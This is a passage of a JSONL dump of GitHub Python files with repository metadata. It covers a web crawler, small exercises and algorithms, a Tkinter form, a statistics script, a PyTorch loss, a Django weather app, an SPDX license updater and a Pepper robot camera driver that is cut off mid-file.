base64\nimport argparse\nfrom util import download_url, parse_reddit_post\nimport re\nfrom collections import deque\nimport time\n\nclass Crawler(object):\n\tdef __init__(self, start_url, storage_dir, urls_to_crawl):\n\t\tself.start_url = start_url\n\t\tself.storage_dir = storage_dir\n\t\tself.urls_to_crawl = urls_to_crawl\n\n\t@staticmethod\n\tdef _make_absolute_url(url):\n\t\treturn 'http://reddit.com' + url\n\n\tdef crawl_reddit(self):\n\t\tcurrent_page_url = self.start_url\n\t\tlogging.getLogger('requests').setLevel(logging.WARNING)\n\t\tlogging.debug('Starting to crawl page {}'.format(self.start_url))\n\n\t\t#headers = {'User-Agent': 'SearchingBot 0.1'}\t\n\t\tok_url_count = 0\n\t\terror_url_count = 0\n\t\twhile True:\t\n\t\t\t\n\t\t\tif (ok_url_count + error_url_count) % 100 == 0:\n\t\t\t\tlogging.info(\"Crawled {} oks - {} errors\".format(ok_url_count, error_url_count))\n\t\t\tcurrent_page = download_reddit_url(current_page_url) # requests.get(current_page_url, headers=headers) \n\t\t\tlogging.debug('Current page: {}'.format(current_page_url))\n\n\t\t\tsoup = BeautifulSoup(current_page)\n\t\t\tlinks = [Crawler._make_absolute_url(a['href']) for a in soup.find_all('a', attrs={'class': 'title'})\n\t\t\t\t\tif not (a['href'].startswith('http') or a['href'].startswith('javascript'))]\n\t\t\ttry:\t\n\t\t\t\tfor link in links:\n\t\t\t\t\tok_url_count += 1\n\t\t\t\t\thtml = download_url(link)\n\t\t\t\t\tstored_text_file_name = os.path.join(self.storage_dir, base64.b16encode(link))\n\t\t\t\t\twith open(stored_text_file_name, 'w') as storage_file:\n\t\t\t\t\t\tstorage_file.write(html.encode('utf-8'))\n\t\t\t\t\ttime.sleep(2)\n\t\t\texcept Exception as e:\n\t\t\t\tlogging.error(u'Error occured while crawling {}'.format(current_page_url))\n\t\t\t\tlogging.exception(e)\n\t\t\t\terror_url_count += 1\n\n\t\t\tnext_page_url = soup.find('a', attrs={'rel': 'next'})['href']\n\t\t\tlogging.debug('First post is {}'.format(links[0]))\n\t\t\tcurrent_page_url = next_page_url\n\t\t\tok_url_count += 1\n\t\t\ttime.sleep(2)\n\n\tdef crawl_wikipedia(self):\n\n\t\tdef check_a_node(a):\n\t\t\tif a and a.get('href', None):\n\t\t\t\turl = a['href']\n\t\t\t\tignore_urls_starts = ['/wiki/Wikipedia', '/wiki/Special', '/wiki/Category',\n\t\t\t\t\t'/wiki/Template_talk'\n\t\t\t\t\t'/wiki/Book', '/wiki/Template', '/wiki/Talk', '/wiki/BookSources', '/wiki/File']\n\t\t\t\tif url.startswith('/wiki') and not url.split(':')[0] in ignore_urls_starts:\n\t\t\t\t\treturn True\n\t\t\treturn False\n\n\t\tdef make_absolute_wiki_url(url):\n\t\t\treturn 'https://en.wikipedia.org' + url\n\n\t\tdef prepare_url(url):\n\t\t\treturn make_absolute_wiki_url(re.split(r'#', a['href'])[0])\t\t\n\n\t\tstart_time = time.time()\n\t\tcurrent_page_url = self.start_url\n\t\tlogging.getLogger('requests').setLevel(logging.WARNING)\n\t\tlogging.debug('Starting to crawl page {}'.format(self.start_url))\n\n\t\t#headers = {'User-Agent': 'SearchingBot 0.1'}\t\n\t\tok_url_count = 0\n\t\terror_url_count = 0\n\t\turl_number = 0\n\t\tlinks_to_crawl = deque()\n\t\tlinks_to_crawl.append(current_page_url)\n\t\tcrawled_links = set()\n\t\twhile True:\t\n\t\t\turl = links_to_crawl.popleft()\n\t\t\tif not url.startswith('https://en.wikipedia.org') or url in crawled_links:\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif (ok_url_count + error_url_count) % 100 == 0:\n\t\t\t\tlogging.info(\"Crawled {} oks - {} errors\".format(ok_url_count, error_url_count))\n\t\t\ttry:\n\t\t\t\tcurrent_page = download_url(url)\n\t\t\t\tlogging.debug('{}. 200: {}'.format(url_number, url))\n\t\t\texcept Exception as e:\n\t\t\t\tstatus_code = e.message\n\t\t\t\tlogging.warning('{}. {}: {}'.format(url_number, status_code, url))\n\t\t\t\tcontinue\n\t\t\turl_number += 1\n\n\t\t\tsoup = BeautifulSoup(current_page, 'html.parser')\n\t\t\tfor tag in soup(['style', 'script']):\n\t\t\t\ttag.extract()\n\n\t\t\tlinks_to_crawl.extend(\n\t\t\t\t[prepare_url(a['href'])\tfor a in soup.find_all('a') if check_a_node(a)])\n\t\t\ttry:\t\t\t\t\t\n\t\t\t\tstored_text_file_name = os.path.join(self.storage_dir, base64.b16encode(url))\n\t\t\t\twith open(stored_text_file_name, 'w') as storage_file:\n\t\t\t\t\tstorage_file.write(soup.get_text().encode('utf-8'))\n\t\t\t\t# time.sleep(2)\n\t\t\texcept Exception as e:\n\t\t\t\tlogging.error(u'Error occured while crawling {}'.format(current_page_url))\n\t\t\t\tlogging.exception(e)\n\t\t\t\terror_url_count += 1\n\t\t\tok_url_count += 1\n\t\t\tcrawled_links.add(url)\n\t\t\tif ok_url_count >= self.urls_to_crawl:\n\t\t\t\tbreak\n\t\tlogging.debug('Total time: {}'.format(time.time() - start_time))\n\t\t\t# time.sleep(2)\t\t\t\n\n\ndef main():\n\tlogging.getLogger().setLevel(logging.DEBUG)\n\tparser = argparse.ArgumentParser(description='Crawl /r/astronomy/')\n\tparser.add_argument('--start_url', dest='start_url', required=True)\n\tparser.add_argument('--storage_dir', dest='storage_dir', required=True)\n\tparser.add_argument('--urls_count', dest='urls_count', type=int)\n\targs = parser.parse_args()\n\t#print args.start_url\n\turls_to_crawl = args.urls_count if hasattr(args, 'urls_count') else 3000\n\tcrawler = Crawler(args.start_url, args.storage_dir, urls_to_crawl)\n\tcrawler.crawl_wikipedia()\n\t\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"electroprovodka/search_engine","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"6565482584","text":"def main():\n '''\n Faça um programa que receba do usuario uma string. \n O programa imprime a string sem suas vogais.\n '''\n text = input('Informe uma palavra ou frase qualquer: ')\n vogais = ['a', 'e', 'i', 'o', 'u']\n \n for x in vogais:\n text = text.replace(x, '')\n print(text)\n \n\nif __name__ == '__main__':\n main()","repo_name":"VicMCA/PythonSamples","sub_path":"ex-strings08_texto-sem-vogais.py","file_name":"ex-strings08_texto-sem-vogais.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"16841960296","text":"'''\nCreated on Jul 29, 2018\n\n@author: MOHIT\n'''\nfrom DSpython.LinkedList.LinkedList.Node import Node\n\n\n\n\nclass list_block:\n count = 1\n\n def __init__(self):\n self.__head = None\n self.__tail = None\n self.__next = None\n self.__nodeCount = 0\n self.__blockNumber = list_block.count\n list_block.count += 1\n\n def get_next(self):\n return self.__next\n\n def set_next(self, value):\n self.__next = value\n\n def get_block_number(self):\n return self.__blockNumber\n\n def set_block_number(self, value):\n self.__blockNumber = value\n\n def get_head(self):\n return self.__head\n\n def get_tail(self):\n return self.__tail\n\n def get_node_count(self):\n return self.__nodeCount\n\n def set_head(self, value):\n self.__head = value\n\n def set_tail(self, value):\n self.__tail = value\n\n def set_node_count(self, value):\n self.__nodeCount = value\n\n\nclass Unrolled_list():\n \n __blockSize=2\n \n def __init__(self):\n self.__head = None\n self.__tail = None\n\n def get_head(self):\n return self.__head\n\n def get_tail(self):\n return self.__tail\n\n def set_head(self, value):\n self.__head = value\n\n def set_tail(self, value):\n self.__tail = value\n\n def length_list(self):\n if self.get_head() is None:\n return 0\n else:\n i = 0\n block = self.get_head()\n while block is not None:\n temp = block.get_head()\n while temp.get_next() is not block.get_head():\n i += 1\n temp = temp.get_next()\n i+=1 \n block = block.get_next()\n return i\n\n def display_list(self):\n if self.get_head() is None:\n return \"List is empty\"\n else:\n block = self.get_head()\n while block is not None:\n print(\"\\nThe block number is : \", block.get_block_number())\n temp = block.get_head()\n print(temp.get_data(), end=\" \")\n temp = temp.get_next()\n while temp is not block.get_head():\n print(temp.get_data(), end=\" \")\n temp = temp.get_next()\n block = block.get_next()\n\n def total_block_number(self):\n if self.get_head() is None:\n return 0\n else:\n block = self.get_head()\n i = 0\n while block is not None:\n i += 1\n block = block.get_next()\n return i\n\n def add_element(self, blockNumber, data):\n if(self.get_head() is None):\n blockHead = list_block()\n new_node = Node(data)\n self.set_head(blockHead)\n blockHead.set_head(new_node)\n blockHead.set_tail(new_node)\n blockHead.get_head().set_next(new_node)\n blockHead.set_node_count(blockHead.get_node_count()+1)\n else:\n if blockNumber == 1:\n block = self.get_head()\n new_node = Node(data)\n block.get_tail().set_next(new_node)\n new_node.set_next(block.get_head())\n block.set_head(new_node)\n block.set_node_count(block.get_node_count()+1)\n self.shift()\n elif blockNumber>self.total_block_number():\n print(\"blockNumber exceeds the actual number of blocks\")\n return\n else:\n i=1\n block = self.get_head()\n new_node = Node(data)\n while i is not blockNumber:\n block=block.get_next()\n i+=1\n temp=block.get_tail()\n temp.set_next(new_node)\n new_node.set_next(block.get_head())\n block.set_head(new_node)\n block.set_node_count(block.get_node_count()+1)\n self.shift()\n \n def shift(self):\n block = self.get_head()\n while block is not None:\n while block.get_node_count()>Unrolled_list.__blockSize:\n temp = block.get_head()\n shift_node = block.get_tail()\n while temp.get_next() is not block.get_tail():\n temp = temp.get_next() \n temp.set_next(block.get_head())\n block.set_tail(temp)\n if block.get_next()==None:\n new_block = list_block()\n block.set_next(new_block)\n new_block.set_head(shift_node)\n new_block.set_tail(shift_node)\n new_block.get_tail().set_next(new_block.get_head())\n block.set_node_count(block.get_node_count()-1)\n new_block.set_node_count(new_block.get_node_count()+1)\n else:\n next_block= block.get_next()\n next_block.get_tail().set_next(shift_node)\n shift_node.set_next(next_block.get_head())\n next_block.set_head(shift_node)\n block.set_node_count(block.get_node_count()-1)\n next_block.set_node_count(next_block.get_node_count()+1)\n block = block.get_next() \n \n def get_element(self,k):\n if k<=0 or k>self.length_list():\n return \"Invalid index\"\n else:\n j = (k+1)//Unrolled_list.__blockSize #item exist in block j\n m = k - (Unrolled_list.__blockSize*(j-1)) #mth item is required in jth block\n l=1\n block = self.get_head()\n while l List[List[int]]:\n res = []\n nums.sort()\n self.dfs(nums, [], res)\n return res\n\n def dfs(self, nums, path, res):\n if not nums:\n res.append(path)\n for i in range(len(nums)):\n if i > 0 and nums[i] == nums[i-1]:\n continue\n self.dfs(nums[:i] + nums[i+1:], path + [nums[i]], res)","repo_name":"KOPFYF/LCEveryday","sub_path":"Graph/DFS_Recursion/permuteUnique47.py","file_name":"permuteUnique47.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21976930969","text":"def Mesure():\n Frame1 = Frame(Window)\n Frame1.place(relx=0.3, rely=0.275, relheight=0.51, relwidth=0.4558)\n Frame1.configure(relief='solid')\n Frame1.configure(borderwidth=\"0\")\n Frame1.configure(relief=\"solid\")\n Frame1.configure(background=\"white\")\n\n Labelframe12 = LabelFrame(Frame1)\n Labelframe12.place(relx=0.012, rely=0.0, relheight=0.099\n , relwidth=0.285)\n Labelframe12.configure(relief='solid')\n Labelframe12.configure(foreground=\"black\")\n Labelframe12.configure(text='''QoS (qualité de service)''')\n Labelframe12.configure(background=\"white\")\n\n Label1 = Label(Frame1)\n Label1.place(relx=0.089, rely=0.203, height=21, width=150)\n Label1.configure(background=\"white\")\n Label1.configure(disabledforeground=\"#a3a3a3\")\n Label1.configure(foreground=\"#000000\")\n Label1.configure(text='''La perte de paquets''', anchor=W)\n\n Label2 = Label(Frame1)\n Label2.place(relx=0.089, rely=0.303, height=21, width=150)\n Label2.configure(background=\"white\")\n Label2.configure(disabledforeground=\"#a3a3a3\")\n Label2.configure(foreground=\"#000000\")\n Label2.configure(text='''La gigue''', anchor=W)\n\n Label3 = Label(Frame1)\n Label3.place(relx=0.089, rely=0.403, height=21, width=150)\n Label3.configure(background=\"white\")\n Label3.configure(disabledforeground=\"#a3a3a3\")\n Label3.configure(foreground=\"#000000\")\n Label3.configure(text='''La latence''', anchor=W)\n\n Label4 = Label(Frame1)\n Label4.place(relx=0.089, rely=0.503, height=21, width=150)\n Label4.configure(background=\"white\")\n Label4.configure(disabledforeground=\"#a3a3a3\")\n Label4.configure(foreground=\"#000000\")\n Label4.configure(text='''La bande passante''', anchor=W)\n\n Label5 = Label(Frame1)\n Label5.place(relx=0.092, rely=0.603, height=21, width=160)\n Label5.configure(background=\"white\")\n Label5.configure(disabledforeground=\"#a3a3a3\")\n Label5.configure(foreground=\"#000000\")\n Label5.configure(text='''La note d'opinion moyenne''', anchor=W)\n\n Label6 = Label(Frame1)\n Label6.place(relx=0.092, rely=0.703, height=21, width=150)\n Label6.configure(background=\"white\")\n Label6.configure(disabledforeground=\"#a3a3a3\")\n Label6.configure(foreground=\"#000000\")\n Label6.configure(text='''Localisation ''', anchor=W)\n\n Entry1 = ttk.Entry(Frame1)\n Entry1.place(relx=0.385, rely=0.203, height=20, relwidth=0.198)\n\n Entry2 = ttk.Entry(Frame1)\n Entry2.place(relx=0.385, rely=0.303, height=20, relwidth=0.198)\n\n Entry3 = ttk.Entry(Frame1)\n Entry3.place(relx=0.385, rely=0.403, height=20, relwidth=0.198)\n\n Entry4 = ttk.Entry(Frame1)\n Entry4.place(relx=0.385, rely=0.503, height=20, relwidth=0.198)\n\n Entry5 = ttk.Entry(Frame1)\n Entry5.place(relx=0.385, rely=0.603, height=20, relwidth=0.191)\n\n Entry6 = ttk.Entry(Frame1)\n Entry6.place(relx=0.385, rely=0.703, height=20, relwidth=0.198)\n\n def DataRec():\n ppT = Entry1.get()\n gigue = Entry2.get()\n latence = Entry3.get()\n Bp = Entry4.get()\n NopMoy = Entry5.get()\n location = Entry6.get()\n if int(ppT) > 10:\n print(\"red\")\n else:\n print(\"vert\")\n\n Window.BTNValide = ttk.Button(Frame1, style=\"AccentButton\")\n Window.BTNValide.place(relx=0.5, rely=0.8, height=30, width=110)\n Window.BTNValide.configure(text=\"Mesures\")\n Window.BTNValide.configure(command=DataRec)\n","repo_name":"ImedZeiri/Subdivision-de-qualit-et-optimisation-des-r-seaux-mobiles","sub_path":"FrontEnd/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"31936290125","text":"import pandas as pd\r\nimport numpy as np\r\nfrom scipy.stats import norm\r\nimport scipy.stats\r\nimport matplotlib.pyplot as plt\r\nimport pylab\r\n\r\ndata = pd.read_csv('residualtest.csv')\r\nx = data['residual']\r\n\r\n#Shapiro-Wilk Test: https://en.wikipedia.org/wiki/Shapiro%E2%80%93Wilk_test\r\nshapiro_test, shapiro_p = scipy.stats.shapiro(x)\r\nprint(\"Shapiro-Wilk Stat:\",shapiro_test, \" Shapiro-Wilk p-Value:\", shapiro_p)\r\n\r\nk2, p = scipy.stats.normaltest(x)\r\nprint('p:',p)\r\n\r\n\r\n#Another method to determining normality is through Quantile-Quantile Plots.\r\nscipy.stats.probplot(x, dist=\"norm\", plot=pylab)\r\npylab.show()\r\n\r\n\r\ndef ecdf(data):\r\n #Compute ECDF\r\n n = len(data)\r\n x = np.sort(data)\r\n y = np.arange(1, n+1) / n\r\n return x, y\r\n\r\n# Compute empirical mean and standard deviation\r\n\r\n# Number of samples\r\nn = len(data['residual'])\r\n\r\n# Sample mean\r\nmu = np.mean(data['residual'])\r\n\r\n# Sample standard deviation\r\nstd = np.std(data['residual'])\r\n\r\nprint('Mean residual: ', mu, 'with standard deviation of +/-', std)\r\n\r\n#Random sampling of the data based off of the mean of the data.\r\nnormalized_sample = np.random.normal(mu, std, size=10000)\r\nx_temperature, y_temperature = ecdf(data['residual'])\r\nnormalized_x, normalized_y = ecdf(normalized_sample)\r\n\r\n# Plot the ECDFs\r\nfig = plt.figure(figsize=(8, 5))\r\nplt.plot(normalized_x, normalized_y)\r\nplt.plot(x_temperature, y_temperature, marker='.', linestyle='none')\r\nplt.ylabel('ECDF')\r\nplt.xlabel('Residual')\r\nplt.legend(('Normal Distribution', 'Sample data'))\r\nplt.show()","repo_name":"bokunopica/OLS-","sub_path":"resi-normtest.py","file_name":"resi-normtest.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"41705963851","text":"# code is taken from https://www.kaggle.com/yerramvarun/cassava-taylorce-loss-label-smoothing-combo\n# implementations reference - https://github.com/CoinCheung/pytorch-loss/blob/master/pytorch_loss/taylor_softmax.py\n# paper - https://www.ijcai.org/Proceedings/2020/0305.pdf\nimport torch\nimport torch.nn as nn\nfrom losses.factory import LabelSmoothingLoss, LabelSmoothingOneHot\n\n\nclass TaylorSoftmax(nn.Module):\n\n def __init__(self, dim=1, n=2):\n super(TaylorSoftmax, self).__init__()\n assert n % 2 == 0\n self.dim = dim\n self.n = n\n\n def forward(self, x):\n fn = torch.ones_like(x)\n denor = 1.\n for i in range(1, self.n + 1):\n denor *= i\n fn = fn + x.pow(i) / denor\n out = fn / fn.sum(dim=self.dim, keepdims=True)\n return out\n\n\nclass TaylorCrossEntropyLoss(nn.Module):\n\n def __init__(self, num_classes,\n n=2, ignore_index=-1, reduction='mean', smoothing=0.2, onehot=True):\n super(TaylorCrossEntropyLoss, self).__init__()\n assert n % 2 == 0\n self.taylor_softmax = TaylorSoftmax(dim=1, n=n)\n self.reduction = reduction\n self.ignore_index = ignore_index\n if onehot:\n self.lab_smooth = LabelSmoothingOneHot(smoothing=smoothing, log_softmax=False)\n else:\n self.lab_smooth = LabelSmoothingLoss(num_classes, smoothing=smoothing, log_softmax=False)\n\n def forward(self, logits, labels):\n log_probs = self.taylor_softmax(logits).log()\n # loss = F.nll_loss(log_probs, labels, reduction=self.reduction,\n # ignore_index=self.ignore_index)\n loss = self.lab_smooth(log_probs, labels)\n return loss\n","repo_name":"sooperset/cassava-leaf-disease-classification","sub_path":"losses/taylor_cross_entropy.py","file_name":"taylor_cross_entropy.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"26586915779","text":"import os\nimport requests\nfrom django.shortcuts import render, redirect\nfrom .forms import User_city\nfrom .models import UserCity\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\nos.chdir('./weather')\n\n@login_required()\ndef get_city(request):\n if request.method == 'POST':\n form = User_city(request.POST)\n if form.is_valid():\n city = form.cleaned_data.get('city')\n user_city, created = UserCity.objects.get_or_create(user=request.user)\n\n user_city.city = city\n user_city.save()\n return redirect(\"/weather\")\n else:\n messages.error(request, \"Enter a valid city\")\n else:\n form = User_city()\n context = {\n 'form': form\n }\n return render(request, 'weather/city.html', context)\n\n\n@login_required()\ndef all_users_weather(request):\n\n with open(\"./hidden/API_KEY.txt\", \"r\") as api_file:\n line = api_file.readline()\n API_KEY = line.strip(\"\\n\")\n\n current_weather_url = \"https://api.openweathermap.org/data/2.5/weather?q={}&appid={}\"\n cities = UserCity.objects.all()\n\n weather_data_dict = {}\n for city_obj in cities:\n city = city_obj.city\n weather_data = find_weather(city,API_KEY, current_weather_url)\n\n weather_data_dict[city_obj.user] = weather_data\n sorted_weather_data = dict(\n sorted(weather_data_dict.items(), key=lambda item: item[1]['temperature'], reverse=True))\n\n context = {\n 'weather_data': sorted_weather_data,\n }\n\n return render(request, 'weather/weather-users.html', context=context)\n\n\n\ndef find_weather(city, api_key, current_weather_url):\n response = requests.get(current_weather_url.format(city, api_key)).json()\n\n weather_data = {\n 'city': city,\n 'temperature': round(response['main']['temp'] - 273.15, 2),\n 'icon': response['weather'][0]['icon']\n }\n return weather_data\n","repo_name":"kirillkiselev-slim/MyPortfolio","sub_path":"AppShare/weather/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30418406603","text":"import time\n\nfrom foamgraph import mkQApp\nfrom foamgraph.backend.QtCore import QEventLoop, QTimer\n\napp = mkQApp()\n\n\ndef processEvents(timeout=0.05):\n for _ in range(2):\n app.processEvents(\n QEventLoop.ProcessEventsFlag.WaitForMoreEvents)\n time.sleep(0.01)\n time.sleep(timeout)\n","repo_name":"zhujun98/foamgraph","sub_path":"foamgraph/test/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"82"} +{"seq_id":"35585361205","text":"import json\nimport os\n\nfrom io import open\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Optional\n\n\ntry:\n from urllib.request import urlopen\nexcept ImportError:\n from urllib2 import urlopen\n\n\nclass Updater:\n\n BASE_URL = \"https://raw.githubusercontent.com/spdx/license-list-data/master/json/\"\n\n def __init__(self, base_url=BASE_URL): # type: (str) -> None\n self._base_url = base_url\n\n def dump(self, file=None): # type: (Optional[str]) -> None\n if file is None:\n file = os.path.join(os.path.dirname(__file__), \"data\", \"licenses.json\")\n\n licenses_url = self._base_url + \"licenses.json\"\n\n with open(file, \"w\", encoding=\"utf-8\") as f:\n f.write(\n json.dumps(self.get_licenses(licenses_url), indent=2, sort_keys=True)\n )\n\n def get_licenses(self, url): # type: (str) -> Dict[str, Any]\n licenses = {}\n with urlopen(url) as r:\n data = json.loads(r.read().decode())\n\n for info in data[\"licenses\"]:\n licenses[info[\"licenseId\"]] = [\n info[\"name\"],\n info[\"isOsiApproved\"],\n info[\"isDeprecatedLicenseId\"],\n ]\n\n return licenses\n","repo_name":"conda/conda-lock","sub_path":"conda_lock/_vendor/poetry/core/spdx/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":385,"dataset":"github-code","pt":"82"} +{"seq_id":"44112497036","text":"import qi\nimport vision_definitions as qivis\nimport motion as qimotion\n\nimport numpy as np\nimport cv2\nfrom threading import RLock\nimport time\n\nfrom is_msgs.image_pb2 import Image, ColorSpaces, Resolution, \\\n ImageFormat, ImageFormats\nfrom is_msgs.camera_pb2 import CameraSetting, FrameTransformation\nfrom is_msgs.common_pb2 import DataType\nfrom is_wire.core import Logger\n\n\ndef assert_type(instance, _type, name):\n if not isinstance(instance, _type):\n raise TypeError(\"Object {} must be of type {}\".format(\n name, _type.DESCRIPTOR.full_name))\n\n\ndef check_status(ok, why=\"Operation Failed\"):\n if not ok or ok == -1:\n raise RuntimeError(why)\n\n\nkPepperTopCamera = qivis.kTopCamera\nkPepperBottomCamera = qivis.kBottomCamera\nkPepperDepthCamera = qivis.kDepthCamera\n\nparameters = {\n \"brightness\": {\n \"id\": qivis.kCameraBrightnessID,\n \"max\": 255,\n \"min\": 0,\n },\n \"exposure\": {\n \"id\": qivis.kCameraExposureID,\n \"max\": 65536,\n \"min\": 0,\n \"auto_id\": qivis.kCameraAutoExpositionID,\n },\n \"hue\": {\n \"id\": qivis.kCameraHueID,\n \"max\": 180,\n \"min\": -180,\n },\n \"saturation\": {\n \"id\": qivis.kCameraSaturationID,\n \"max\": 255,\n \"min\": 0,\n },\n \"gain\": {\n \"id\": qivis.kCameraGainID,\n \"max\": 1024,\n \"min\": 0,\n \"auto_id\": qivis.kCameraAutoGainID\n },\n \"focus\": {\n \"auto_id\": qivis.kCameraAutoFocusID\n }\n}\n\n\ndef resolution_is_to_naoqi(resolution):\n if resolution.width == 80 and resolution.height == 60:\n return qivis.kQQQVGA\n if resolution.width == 160 and resolution.height == 120:\n return qivis.kQQVGA\n if resolution.width == 320 and resolution.height == 240:\n return qivis.kQVGA\n if resolution.width == 640 and resolution.height == 480:\n return qivis.kVGA\n if resolution.width == 1280 and resolution.height == 960:\n return qivis.k4VGA\n raise RuntimeError(\n \"Invalid Resolution Value, expected (80,60) or (160,120)\"\n \" or (320,240) or (640,480) or (1280,960)\")\n\n\ndef color_space_is_to_naoqi(color_space):\n if color_space == ColorSpaces.Value(\"RGB\") or \\\n color_space == ColorSpaces.Value(\"GRAY\"):\n return qivis.kBGRColorSpace\n if color_space == ColorSpaces.Value(\"HSV\"):\n return qivis.kHSVColorSpace\n if color_space == ColorSpaces.Value(\"YCbCr\"):\n return qivis.kYYCbCrColorSpace\n raise RuntimeError(\"Invalid ColorSpace value\")\n\n\nclass PepperCameraDriver(object):\n lock = RLock()\n logger = Logger(\"PepperCameraDriver\")\n\n def __init__(self, robot_uri, camera_id, camera_frame_id, base_frame_id):\n self.qi_app = qi.Application(\n [\"is::PepperCameraDriver\", \"--qi-url=\" + robot_uri])\n self.qi_app.start()\n self.qi_session = self.qi_app.session\n\n self.video = self.qi_session.service(\"ALVideoDevice\")\n\n self.camera = None\n self.camera_id = camera_id\n\n self.fps = 10.0\n self.deadline = None\n self.resolution = Resolution(width=320, height=240)\n self.color_space = ColorSpaces.Value(\"GRAY\")\n image_format = ImageFormat()\n image_format.format = ImageFormats.Value(\"JPEG\")\n image_format.compression.value = 0.8\n self.set_image_format(image_format)\n\n self.motion = self.qi_session.service(\"ALMotion\")\n self.camera_frame_id = camera_frame_id\n self.base_frame_id = base_frame_id\n\n def __set_parameter(self, name, camera_setting):\n assert_type(camera_setting, CameraSetting, \"camera_setting\")\n with self.lock:\n param = parameters[name]\n if \"auto_id\" in param:\n value = camera_setting.automatic\n status = self.video.setCameraParameter(self.camera,\n param[\"auto_id\"], value)\n check_status(\n status,\n \"Failed to set camera parameter='{}' to automatic={}\".\n format(name, value))\n\n if \"id\" in param and not camera_setting.automatic:\n ratio = camera_setting.ratio\n value = (param[\"max\"] - param[\"min\"]) * ratio + param[\"min\"]\n status = self.video.setCameraParameter(self.camera,\n param[\"id\"], value)\n check_status(status)\n\n def __get_parameter(self, name):\n camera_setting = CameraSetting()\n with self.lock:\n parameter = parameters[name]\n if \"auto_id\" in parameter:\n camera_setting.automatic = self.video.getCameraParameter(\n self.camera, parameter[\"auto_id\"])\n\n if \"id\" in parameter:\n value = self.video.getCameraParameter(self.camera,\n parameter[\"id\"])\n camera_setting.ratio = (value - parameter[\"min\"]) / float(\n parameter[\"max\"] - parameter[\"min\"])\n return camera_setting\n\n # Sampling Settings\n def set_sampling_rate(self, value):\n assert_type(value, (int, float), \"value\")\n with self.lock:\n check_status(self.video.setFrameRate(self.camera, int(value)))\n self.fps = value\n\n def set_delay(self, value):\n pass\n\n def get_sampling_rate(self):\n with self.lock:\n value = self.video.getFrameRate(self.camera)\n check_status(value, \"Failed to retrieve frame rate\")\n self.fps = value\n return value\n\n def get_delay(self):\n return None\n\n # Image Settings\n def set_resolution(self, resolution):\n assert_type(resolution, Resolution, \"resolution\")\n with self.lock:\n check_status(\n self.video.setResolution(self.camera,\n resolution_is_to_naoqi(resolution)),\n \"Failed to change resolution\")\n self.resolution = resolution\n\n def set_image_format(self, image_format):\n assert_type(image_format, ImageFormat, \"image_format\")\n with self.lock:\n if image_format.format == ImageFormats.Value(\"JPEG\"):\n self.encode_format = \".jpeg\"\n elif image_format.format == ImageFormats.Value(\"PNG\"):\n self.encode_format = \".png\"\n elif image_format.format == ImageFormats.Value(\"WebP\"):\n self.encode_format = \".webp\"\n\n if image_format.HasField(\"compression\"):\n if self.encode_format == '.jpeg':\n self.encode_parameters = [\n cv2.IMWRITE_JPEG_QUALITY,\n int(image_format.compression.value * (100 - 0) + 0)\n ]\n elif self.encode_format == '.png':\n self.encode_parameters = [\n cv2.IMWRITE_PNG_COMPRESSION,\n int(image_format.compression.value * (9 - 0) + 0)\n ]\n elif self.encode_format == '.webp':\n self.encode_parameters = [\n cv2.IMWRITE_WEBP_QUALITY,\n int(image_format.compression.value * (100 - 1) + 1)\n ]\n\n def set_color_space(self, color_space):\n assert_type(color_space, int, \"color_space\")\n with self.lock:\n check_status(\n self.video.setColorSpace(self.camera,\n color_space_is_to_naoqi(color_space)),\n \"Failed to set color space\")\n self.color_space = color_space\n\n def set_region_of_interest(self, bounding_poly):\n pass\n\n def get_resolution(self):\n with self.lock:\n value = self.video.getResolution(self.camera)\n resolution = Resolution()\n if value == qivis.kQQQVGA:\n resolution.width = 80\n resolution.height = 60\n elif value == qivis.kQQVGA:\n resolution.width = 160\n resolution.height = 120\n elif value == qivis.kQVGA:\n resolution.width = 320\n resolution.height = 240\n elif value == qivis.kVGA:\n resolution.width = 640\n resolution.height = 480\n elif value == qivis.k4VGA:\n resolution.width = 1280\n resolution.height = 960\n elif value == qivis.k16VGA:\n resolution.width = 2560\n resolution.height = 1920\n self.resolution = resolution\n return resolution\n\n def get_image_format(self):\n image_format = ImageFormat()\n with self.lock:\n if self.encode_format == \".jpeg\":\n image_format.format = ImageFormats.Value(\"JPEG\")\n image_format.compression.value = self.encode_parameters[1] / 100.0\n elif self.encode_format == \".png\":\n image_format.format = ImageFormats.Value(\"PNG\")\n image_format.compression.value = self.encode_parameters[1] / 9.0\n elif self.encode_format == \".webp\":\n image_format.format = ImageFormats.Value(\"WebP\")\n image_format.compression.value = (\n self.encode_parameters[1] - 1) / 99.0\n return image_format\n\n def get_color_space(self):\n with self.lock:\n return self.color_space\n\n def get_region_of_interest(self):\n return None\n\n # Camera Settings\n def set_brightness(self, camera_setting):\n self.__set_parameter(\"brightness\", camera_setting)\n\n def set_exposure(self, camera_setting):\n self.__set_parameter(\"exposure\", camera_setting)\n\n def set_focus(self, camera_setting):\n self.__set_parameter(\"focus\", camera_setting)\n\n def set_sharpness(self, camera_setting):\n pass\n\n def set_hue(self, camera_setting):\n self.__set_parameter(\"hue\", camera_setting)\n\n def set_saturation(self, camera_setting):\n 